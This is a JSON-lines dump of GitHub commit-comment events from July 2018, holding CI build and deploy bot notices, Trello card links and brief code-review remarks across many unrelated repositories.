{"id":"7958969182","type":"CommitCommentEvent","actor":{"login":"bodgergely"},"repo":{"name":"rafalmiel/cykusz-rs"},"payload":{"comment":{"id":29691926,"position":null,"line":null,"path":null,"commit_id":"46ad3e90ad5862753c51ce0643bf2a3b2c99ff7b","created_at":"2018-07-12T22:06:50Z","updated_at":"2018-07-12T22:06:50Z","author_association":"NONE","body":"pushing to vector"}},"created_at":"2018-07-12T22:06:50Z"}
{"id":"7958971715","type":"CommitCommentEvent","actor":{"login":"Lucetia"},"repo":{"name":"DFortun81/AllTheThings"},"payload":{"comment":{"id":29691929,"position":null,"line":null,"path":null,"commit_id":"86f2eba4839f6f1c7df282a7a6b9ba7da92dcead","created_at":"2018-07-12T22:07:31Z","updated_at":"2018-07-12T22:07:31Z","author_association":"COLLABORATOR","body":"Thank you .  I tried looking on wowhead, but it claims there wasn't one at all and I didn't have time to log on my alliance toon that day."}},"created_at":"2018-07-12T22:07:31Z"}
{"id":"7958975063","type":"CommitCommentEvent","actor":{"login":"fredcrint"},"repo":{"name":"fredcrint/apollo-metadata-views"},"payload":{"comment":{"id":29691934,"position":null,"line":null,"path":null,"commit_id":"32da058185d5af5e46e3647e929b7899f93edd13","created_at":"2018-07-12T22:08:31Z","updated_at":"2018-07-12T22:08:31Z","author_association":"OWNER","body":"Was this committed?"}},"created_at":"2018-07-12T22:08:31Z"}
{"id":"7958975827","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Redux-Friends"},"payload":{"comment":{"id":29691937,"position":null,"line":null,"path":null,"commit_id":"1e4e445c52ef434276902cf09ead32fac4ca7a59","created_at":"2018-07-12T22:08:45Z","updated_at":"2018-07-12T22:08:45Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Make the form add a new friend to the list](https://trello.com/c/KtdFu02m/8-make-the-form-add-a-new-friend-to-the-list)"}},"created_at":"2018-07-12T22:08:45Z"}
{"id":"7958976445","type":"CommitCommentEvent","actor":{"login":"ivanbrennan"},"repo":{"name":"ivanbrennan/fakeproject"},"payload":{"comment":{"id":29691938,"position":28,"line":28,"path":"shell.nix","commit_id":"e8f525226303dc563610af3d7f5a258c636e4f2a","created_at":"2018-07-12T22:08:55Z","updated_at":"2018-07-12T22:08:55Z","author_association":"OWNER","body":"@manveru Good to know, thanks :+1: \r\n\r\nI've also been trying to figure out how I can use the `interactive-editor` gem within a rails console, though that gem's not in my project's Gemfile. I have a [Nix expression](https://github.com/ivanbrennan/nixbox/tree/master/overlays/core/interactive-editor) for it, and I added it to `pkgs` via an overlay, then listed it here in `buildInputs`, but no dice.\r\n\r\nIt's been a while since I worked in Rails though (or Ruby, for that matter), so I might just be trying the impossible. I can't remember if I was able to access a gem outside my project's listed gems from a Rails console in the (non-NixOS) past."}},"created_at":"2018-07-12T22:08:55Z"}
{"id":"7958982280","type":"CommitCommentEvent","actor":{"login":"techgique"},"repo":{"name":"CDRH/orchid"},"payload":{"comment":{"id":29691954,"position":5,"line":50,"path":"app/views/items/_facets.html.erb","commit_id":"ac13ae07a1bd0f216fbc757a61e7756c78ae33ac","created_at":"2018-07-12T22:10:30Z","updated_at":"2018-07-12T22:10:30Z","author_association":"MEMBER","body":"Was this setting a different parameter name than \"facet\" before? Or is that changed by the i18n?"}},"created_at":"2018-07-12T22:10:30Z"}
{"id":"7958984455","type":"CommitCommentEvent","actor":{"login":"techgique"},"repo":{"name":"CDRH/orchid"},"payload":{"comment":{"id":29691956,"position":5,"line":7,"path":"app/views/items/_search_res_items.html.erb","commit_id":"ac13ae07a1bd0f216fbc757a61e7756c78ae33ac","created_at":"2018-07-12T22:11:05Z","updated_at":"2018-07-12T22:11:05Z","author_association":"MEMBER","body":"Ah, this change seems to apply to multiple path helpers"}},"created_at":"2018-07-12T22:11:05Z"}
{"id":"7958984853","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29691958,"position":null,"line":null,"path":null,"commit_id":"f7578b8123e727d2e9272f66011f802c3d6ee924","created_at":"2018-07-12T22:11:11Z","updated_at":"2018-07-12T22:11:11Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-479](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-479).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-479-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-12T22:11:11Z"}
{"id":"7958988089","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29691964,"position":null,"line":null,"path":null,"commit_id":"8bf8dbe9c3e2b13dc4c9ee5a07612d672b5c8fc7","created_at":"2018-07-12T22:12:02Z","updated_at":"2018-07-12T22:12:02Z","author_association":"NONE","body":"issue_6802 (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2973 of 2973 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bf8dbe9c3e2b13dc4c9ee5a07612d672b5c8fc7-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bf8dbe9c3e2b13dc4c9ee5a07612d672b5c8fc7-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T22:12:02Z"}
{"id":"7958990226","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29691972,"position":null,"line":null,"path":null,"commit_id":"b3e0d81d3704fc9541a4575f79ba27932bd731dc","created_at":"2018-07-12T22:12:36Z","updated_at":"2018-07-12T22:12:36Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implementar a efetuação uma Compra e todas suas dependências](https://trello.com/c/lbATkDET/188-implementar-a-efetua%C3%A7%C3%A3o-uma-compra-e-todas-suas-depend%C3%AAncias)"}},"created_at":"2018-07-12T22:12:36Z"}
{"id":"7958993329","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":29691975,"position":null,"line":null,"path":null,"commit_id":"6442e1cc03e26d62d8d13cd30ebe2ceba599099f","created_at":"2018-07-12T22:13:29Z","updated_at":"2018-07-12T22:13:29Z","author_association":"NONE","body":"TeamCity Xbim :: Xbim Windows UI :: XbimWindowsUi [Build 82](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1923&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) is now running\n"}},"created_at":"2018-07-12T22:13:29Z"}
{"id":"7958994295","type":"CommitCommentEvent","actor":{"login":"rudkx"},"repo":{"name":"apple/swift-package-manager"},"payload":{"comment":{"id":29691979,"position":null,"line":null,"path":null,"commit_id":"a6776beb9f150b6d6bc796331ec083d6dcf208c2","created_at":"2018-07-12T22:13:45Z","updated_at":"2018-07-12T22:13:45Z","author_association":"MEMBER","body":"@aciidb0mb3r Does this fix the RPATH related issue here?\r\n\r\n`--- bootstrap: error: unable to add RPATHs on this platform`\r\n\r\nhttps://ci.swift.org/job/swift-PR-Linux-smoke-test/8179/consoleFull#6754395403122a513-f36a-4c87-8ed7-cbc36a1ec144\r\n\r\n"}},"created_at":"2018-07-12T22:13:45Z"}
{"id":"7958995059","type":"CommitCommentEvent","actor":{"login":"dbarev"},"repo":{"name":"elgatito/script.elementum.burst"},"payload":{"comment":{"id":29691981,"position":null,"line":null,"path":null,"commit_id":"1e3cf40d3f5d5ff309a4fd3cbf5731183dc62d46","created_at":"2018-07-12T22:13:58Z","updated_at":"2018-07-12T22:13:58Z","author_association":"CONTRIBUTOR","body":"Hi @elgatito I think you accidentally ruined my commit by reverting back the  burst/burst.py from before my commit. Now the new Bulgarian trackers are not working."}},"created_at":"2018-07-12T22:13:58Z"}
{"id":"7958996293","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29691984,"position":null,"line":null,"path":null,"commit_id":"4d89755748773cfc357d0cbaf4f8e2cabc2c81fe","created_at":"2018-07-12T22:14:19Z","updated_at":"2018-07-12T22:14:19Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - x86_64-MacOS-10.9-clang: OK (2932 of 2934 tests passed, 24 test warnings)\n\nMessages:\n\n * 13 tests had: AUD diffs.\n * 11 tests had: ERR diffs.\n * 4 tests had: RDD diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 646\n * Failed: 1\n\nintegration Test Summary\n * Passed: 624\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4d89755748773cfc357d0cbaf4f8e2cabc2c81fe-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4d89755748773cfc357d0cbaf4f8e2cabc2c81fe-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-12T22:14:19Z"}
{"id":"7958996886","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":29691985,"position":null,"line":null,"path":null,"commit_id":"6442e1cc03e26d62d8d13cd30ebe2ceba599099f","created_at":"2018-07-12T22:14:29Z","updated_at":"2018-07-12T22:14:29Z","author_association":"NONE","body":"TeamCity Xbim :: Xbim Windows UI :: XbimWindowsUi [Build 82](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1923&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:55"}},"created_at":"2018-07-12T22:14:29Z"}
{"id":"7958999050","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":29691991,"position":null,"line":null,"path":null,"commit_id":"6a4184d6f50b27048f065cbbcb6e59289f5d5067","created_at":"2018-07-12T22:15:08Z","updated_at":"2018-07-12T22:15:08Z","author_association":"NONE","body":"TeamCity Xbim :: Xbim Windows UI :: XbimWindowsUi [Build 83](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1924&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) is now running\n"}},"created_at":"2018-07-12T22:15:08Z"}
{"id":"7958999647","type":"CommitCommentEvent","actor":{"login":"brianhlin"},"repo":{"name":"opensciencegrid/user-school-2018"},"payload":{"comment":{"id":29691995,"position":null,"line":null,"path":null,"commit_id":"0fc67c5f3b154be44342163494f898e9e0aedc86","created_at":"2018-07-12T22:15:17Z","updated_at":"2018-07-12T22:15:17Z","author_association":"MEMBER","body":"No but I'm pretty sure that's the default if you don't specify a syntax"}},"created_at":"2018-07-12T22:15:17Z"}
{"id":"7959001364","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":29692000,"position":null,"line":null,"path":null,"commit_id":"6a4184d6f50b27048f065cbbcb6e59289f5d5067","created_at":"2018-07-12T22:15:46Z","updated_at":"2018-07-12T22:15:46Z","author_association":"NONE","body":"TeamCity Xbim :: Xbim Windows UI :: XbimWindowsUi [Build 83](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1924&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:00:36"}},"created_at":"2018-07-12T22:15:46Z"}
{"id":"7959001778","type":"CommitCommentEvent","actor":{"login":"Lucetia"},"repo":{"name":"DFortun81/AllTheThings"},"payload":{"comment":{"id":29692001,"position":null,"line":null,"path":null,"commit_id":"86f2eba4839f6f1c7df282a7a6b9ba7da92dcead","created_at":"2018-07-12T22:15:53Z","updated_at":"2018-07-12T22:15:53Z","author_association":"COLLABORATOR","body":"Fixed it in commit  489b3a8"}},"created_at":"2018-07-12T22:15:53Z"}
{"id":"7959001877","type":"CommitCommentEvent","actor":{"login":"mweinst"},"repo":{"name":"mweinst/mweinst.github.io"},"payload":{"comment":{"id":29692002,"position":null,"line":null,"path":null,"commit_id":"18644166d7355c1bafc6a1052bc393be93bf25cb","created_at":"2018-07-12T22:15:55Z","updated_at":"2018-07-12T22:15:55Z","author_association":"OWNER","body":"submitted "}},"created_at":"2018-07-12T22:15:55Z"}
{"id":"7959003724","type":"CommitCommentEvent","actor":{"login":"Leekailklk"},"repo":{"name":"Bytom-Community/Bytom-Server"},"payload":{"comment":{"id":29692006,"position":null,"line":null,"path":null,"commit_id":"80c70a792c3f597b624664cd493530a0697544df","created_at":"2018-07-12T22:16:26Z","updated_at":"2018-07-12T22:16:26Z","author_association":"NONE","body":"change sql method from get slice of blocks to get single block value from DB."}},"created_at":"2018-07-12T22:16:26Z"}
{"id":"7959004513","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29692007,"position":null,"line":null,"path":null,"commit_id":"8bf8dbe9c3e2b13dc4c9ee5a07612d672b5c8fc7","created_at":"2018-07-12T22:16:40Z","updated_at":"2018-07-12T22:16:40Z","author_association":"NONE","body":"issue_6802 (mbadams5) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bf8dbe9c3e2b13dc4c9ee5a07612d672b5c8fc7-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-12T22:16:40Z"}
{"id":"7959005970","type":"CommitCommentEvent","actor":{"login":"WaxCylinderRevival"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29692010,"position":null,"line":null,"path":null,"commit_id":"d49ecd2a4b0f05cf7d9e0238bfcfd858c3cf75bd","created_at":"2018-07-12T22:17:05Z","updated_at":"2018-07-12T22:17:05Z","author_association":"MEMBER","body":"^ Correcting above commit message: \"but the texts weren't note originally footnotes\""}},"created_at":"2018-07-12T22:17:05Z"}
{"id":"7959007599","type":"CommitCommentEvent","actor":{"login":"alegout"},"repo":{"name":"PrestaShop/PrestaShop"},"payload":{"comment":{"id":29692014,"position":9,"line":120,"path":"themes/classic/modules/contactform/views/templates/widget/contactform.tpl","commit_id":"ccb6989fb28a931d6e0141ce6559148ca404bb0e","created_at":"2018-07-12T22:17:32Z","updated_at":"2018-07-12T22:17:32Z","author_association":"CONTRIBUTOR","body":"Hello @DamienMetzger,\r\n\r\nhttps://github.com/PrestaShop/PrestaShop/pull/8873/files/ccb6989fb28a931d6e0141ce6559148ca404bb0e#diff-6dbbe27a55f3c55c0938bea44364f06f\r\n\r\nThanks for you feedback."}},"created_at":"2018-07-12T22:17:32Z"}
{"id":"7959008539","type":"CommitCommentEvent","actor":{"login":"berndsi"},"repo":{"name":"wikimedia/restbase"},"payload":{"comment":{"id":29692019,"position":null,"line":null,"path":null,"commit_id":"f33bfc3451800de86b75b6b95e573db6eca595a0","created_at":"2018-07-12T22:17:49Z","updated_at":"2018-07-12T22:17:49Z","author_association":"CONTRIBUTOR","body":"Sorry, I just noticed this so late since I'm trying to do a similar PR for exposing a JavaScript bundle.\r\nI don't see the YAML specification tests executed when running `npm test`. So, if someone messes up the project/*.yaml files it wouldn't get noticed. Do you run the spec check every time you run `npm test`? If so, how? Do you use a different script?"}},"created_at":"2018-07-12T22:17:49Z"}
{"id":"7959011935","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-smbc-bot"},"payload":{"comment":{"id":29692027,"position":null,"line":null,"path":null,"commit_id":"2ba67b60f56e10c1aafa5ddc19635be357fbe90e","created_at":"2018-07-12T22:18:47Z","updated_at":"2018-07-12T22:18:47Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/59483139-581b-420d-90f0-d1a4f85c757d?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-smbc-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/60053b78-cf64-42ea-8ce3-3ba3ce629cf0?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-smbc-bot\") deployed [watsonwork-smbc-bot](https://github.com/WilliamHolmes/watsonwork-smbc-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-221845 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-221845\") to [dev](https://console.bluemix.net/apps/614b28c8-bbda-4a4b-b0da-a51b1e3ed64a?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T22:18:47Z"}
{"id":"7959015470","type":"CommitCommentEvent","actor":{"login":"aciidb0mb3r"},"repo":{"name":"apple/swift-package-manager"},"payload":{"comment":{"id":29692032,"position":null,"line":null,"path":null,"commit_id":"a6776beb9f150b6d6bc796331ec083d6dcf208c2","created_at":"2018-07-12T22:19:48Z","updated_at":"2018-07-12T22:19:48Z","author_association":"MEMBER","body":"This should fix it https://github.com/apple/swift-package-manager/pull/1667"}},"created_at":"2018-07-12T22:19:48Z"}
{"id":"7959017233","type":"CommitCommentEvent","actor":{"login":"matyasselmeci"},"repo":{"name":"opensciencegrid/user-school-2018"},"payload":{"comment":{"id":29692039,"position":null,"line":null,"path":null,"commit_id":"0fc67c5f3b154be44342163494f898e9e0aedc86","created_at":"2018-07-12T22:20:17Z","updated_at":"2018-07-12T22:20:17Z","author_association":"NONE","body":"I thought the default if you don't specify a syntax is not to run it through Pygments at all"}},"created_at":"2018-07-12T22:20:17Z"}
{"id":"7959020783","type":"CommitCommentEvent","actor":{"login":"lizmat"},"repo":{"name":"perl6/nqp"},"payload":{"comment":{"id":29692052,"position":null,"line":null,"path":null,"commit_id":"60f07ed644cfa4e28610458f4b689599cf14d3dc","created_at":"2018-07-12T22:21:18Z","updated_at":"2018-07-12T22:21:18Z","author_association":"MEMBER","body":"s/chars/codes/ ?"}},"created_at":"2018-07-12T22:21:18Z"}
{"id":"7959025716","type":"CommitCommentEvent","actor":{"login":"sarahg"},"repo":{"name":"sarahg/borked"},"payload":{"comment":{"id":29692060,"position":null,"line":null,"path":null,"commit_id":"26be0805cd8230122b19bc9dae6366b06cead7e1","created_at":"2018-07-12T22:22:46Z","updated_at":"2018-07-12T22:22:46Z","author_association":"OWNER","body":"Created multidev environment [borked#pr-4](https://dashboard.pantheon.io/sites/8f2545fd-8ec0-4689-8fab-e0e8bb485e35#pr-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-4-borked.pantheonsite.io/)"}},"created_at":"2018-07-12T22:22:46Z"}
{"id":"7959028097","type":"CommitCommentEvent","actor":{"login":"kevinrichard669"},"repo":{"name":"facebook/buck"},"payload":{"comment":{"id":29692069,"position":null,"line":null,"path":null,"commit_id":"033e616ee22e0a03b1346d92a599ce96691625fc","created_at":"2018-07-12T22:23:26Z","updated_at":"2018-07-12T22:23:26Z","author_association":"NONE","body":"[Doc1.docx](https://github.com/facebook/buck/files/2190509/Doc1.docx)\r\n"}},"created_at":"2018-07-12T22:23:26Z"}
{"id":"7959032010","type":"CommitCommentEvent","actor":{"login":"gozulio"},"repo":{"name":"gozulio/Polaris"},"payload":{"comment":{"id":29692080,"position":null,"line":null,"path":null,"commit_id":"6d5f1c799412d4c3a31aa97fbe0997d81980eaec","created_at":"2018-07-12T22:24:33Z","updated_at":"2018-07-12T22:24:33Z","author_association":"OWNER","body":"Typo in the commit.\r\nR-UST Consoles will ~~not~~ now be inaccessible if broken or unpowered."}},"created_at":"2018-07-12T22:24:33Z"}
{"id":"7959049411","type":"CommitCommentEvent","actor":{"login":"WaxCylinderRevival"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29692132,"position":null,"line":null,"path":null,"commit_id":"d49ecd2a4b0f05cf7d9e0238bfcfd858c3cf75bd","created_at":"2018-07-12T22:29:39Z","updated_at":"2018-07-12T22:29:39Z","author_association":"MEMBER","body":"@vak2ve, I would have as well!  Thanks for all your efforts to make sense of these idiosyncratic volumes!\r\n\r\nI'll check in with Mandy to see if she has thoughts and then discuss with you so we can have a potentially reusable logic -> encoding decision if we encounter such in the future. =)"}},"created_at":"2018-07-12T22:29:39Z"}
{"id":"7959049984","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29692134,"position":null,"line":null,"path":null,"commit_id":"aeaa043aca830a5cce6770ae54f7212932149af6","created_at":"2018-07-12T22:29:49Z","updated_at":"2018-07-12T22:29:49Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-222947 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-222947\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T22:29:49Z"}
{"id":"7959055424","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29692152,"position":null,"line":null,"path":null,"commit_id":"0a8026391214e3a9561ed7ddb6ed54fc8ce8b4ec","created_at":"2018-07-12T22:31:16Z","updated_at":"2018-07-12T22:31:16Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-223115 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-223115\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T22:31:16Z"}
{"id":"7959056926","type":"CommitCommentEvent","actor":{"login":"peterdolan"},"repo":{"name":"lob/lob-node"},"payload":{"comment":{"id":29692155,"position":9,"line":9,"path":"CHANGELOG.md","commit_id":"0873b10560ed057d8bfe41b38b839cf172e7d79d","created_at":"2018-07-12T22:31:41Z","updated_at":"2018-07-12T22:31:41Z","author_association":"CONTRIBUTOR","body":"Nit: capitalize `replace`"}},"created_at":"2018-07-12T22:31:41Z"}
{"id":"7959058515","type":"CommitCommentEvent","actor":{"login":"santracm"},"repo":{"name":"santracm/helloworld-1"},"payload":{"comment":{"id":29692162,"position":1,"line":1,"path":"README.md","commit_id":"e12dedd6b7b68b195d2d06df41ef01064194de6f","created_at":"2018-07-12T22:32:11Z","updated_at":"2018-07-12T22:32:11Z","author_association":"OWNER","body":"This is my first test"}},"created_at":"2018-07-12T22:32:11Z"}
{"id":"7959063130","type":"CommitCommentEvent","actor":{"login":"asteed"},"repo":{"name":"nikharris0/probemon"},"payload":{"comment":{"id":29692170,"position":23,"line":96,"path":"probemon.py","commit_id":"76e2bd66999d7e49fa3e727eab1aa8619e53cfac","created_at":"2018-07-12T22:33:30Z","updated_at":"2018-07-12T22:33:30Z","author_association":"NONE","body":"loluforgottehnewline"}},"created_at":"2018-07-12T22:33:30Z"}
{"id":"7959063466","type":"CommitCommentEvent","actor":{"login":"Focusvity"},"repo":{"name":"TFPatches/TotalFreedomMod"},"payload":{"comment":{"id":29692171,"position":null,"line":null,"path":null,"commit_id":"f167134a3a833fcefe849afc36dcc21391f1be24","created_at":"2018-07-12T22:33:37Z","updated_at":"2018-07-12T22:33:37Z","author_association":"NONE","body":"Apprantely you don’t understand the purpose of the suggestion. The suggestion was to add message declaring the player (if not admin or master builder) is an op to clear some confusion with other admins. "}},"created_at":"2018-07-12T22:33:37Z"}
{"id":"7959064537","type":"CommitCommentEvent","actor":{"login":"brunoclaudino"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29692175,"position":null,"line":null,"path":null,"commit_id":"7429f8a335c7ac21bc9bbcc04e3199b40837a035","created_at":"2018-07-12T22:33:56Z","updated_at":"2018-07-12T22:33:56Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Realizar transações financeiras entre produtor e consumidor](https://trello.com/c/Yhxdn914/210-realizar-transa%C3%A7%C3%B5es-financeiras-entre-produtor-e-consumidor)"}},"created_at":"2018-07-12T22:33:56Z"}
{"id":"7959068509","type":"CommitCommentEvent","actor":{"login":"brunoclaudino"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29692185,"position":null,"line":null,"path":null,"commit_id":"ed7f965dba189e269e57b4de0e5b31f0c1c53cff","created_at":"2018-07-12T22:35:09Z","updated_at":"2018-07-12T22:35:09Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Realizar transações financeiras entre produtor e consumidor](https://trello.com/c/Yhxdn914/210-realizar-transa%C3%A7%C3%B5es-financeiras-entre-produtor-e-consumidor)"}},"created_at":"2018-07-12T22:35:09Z"}
{"id":"7959068510","type":"CommitCommentEvent","actor":{"login":"brunoclaudino"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29692184,"position":null,"line":null,"path":null,"commit_id":"ed7f965dba189e269e57b4de0e5b31f0c1c53cff","created_at":"2018-07-12T22:35:09Z","updated_at":"2018-07-12T22:35:09Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Realizar transações financeiras entre produtor e consumidor](https://trello.com/c/Yhxdn914/210-realizar-transa%C3%A7%C3%B5es-financeiras-entre-produtor-e-consumidor)"}},"created_at":"2018-07-12T22:35:09Z"}
{"id":"7959069249","type":"CommitCommentEvent","actor":{"login":"CollinJ0"},"repo":{"name":"CollinJ0/abstar"},"payload":{"comment":{"id":29692187,"position":null,"line":null,"path":null,"commit_id":"4efd4b4824c7b3ed2efbfafbabe7d50c06f4f43c","created_at":"2018-07-12T22:35:21Z","updated_at":"2018-07-12T22:35:21Z","author_association":"OWNER","body":"Added ability to analyze tcr"}},"created_at":"2018-07-12T22:35:21Z"}
{"id":"7959069916","type":"CommitCommentEvent","actor":{"login":"brunoclaudino"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29692190,"position":null,"line":null,"path":null,"commit_id":"8cf5521d352325ceb3d7096145735a1ca0716292","created_at":"2018-07-12T22:35:33Z","updated_at":"2018-07-12T22:35:33Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Realizar transações financeiras entre produtor e consumidor](https://trello.com/c/Yhxdn914/210-realizar-transa%C3%A7%C3%B5es-financeiras-entre-produtor-e-consumidor)"}},"created_at":"2018-07-12T22:35:33Z"}
{"id":"7959069922","type":"CommitCommentEvent","actor":{"login":"brunoclaudino"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29692191,"position":null,"line":null,"path":null,"commit_id":"8cf5521d352325ceb3d7096145735a1ca0716292","created_at":"2018-07-12T22:35:33Z","updated_at":"2018-07-12T22:35:33Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Realizar transações financeiras entre produtor e consumidor](https://trello.com/c/Yhxdn914/210-realizar-transa%C3%A7%C3%B5es-financeiras-entre-produtor-e-consumidor)"}},"created_at":"2018-07-12T22:35:33Z"}
{"id":"7959072776","type":"CommitCommentEvent","actor":{"login":"cmb69"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29692194,"position":11,"line":763,"path":"configure.ac","commit_id":"4e0b3c0c4c27cddcff6013a2c408597bbe87d2d5","created_at":"2018-07-12T22:36:26Z","updated_at":"2018-07-12T22:36:26Z","author_association":"CONTRIBUTOR","body":"@devnexen @nikic Wouldn't it be sensible to insert `return 1;` before the `end:`, just to make sure the jump actually works?"}},"created_at":"2018-07-12T22:36:26Z"}
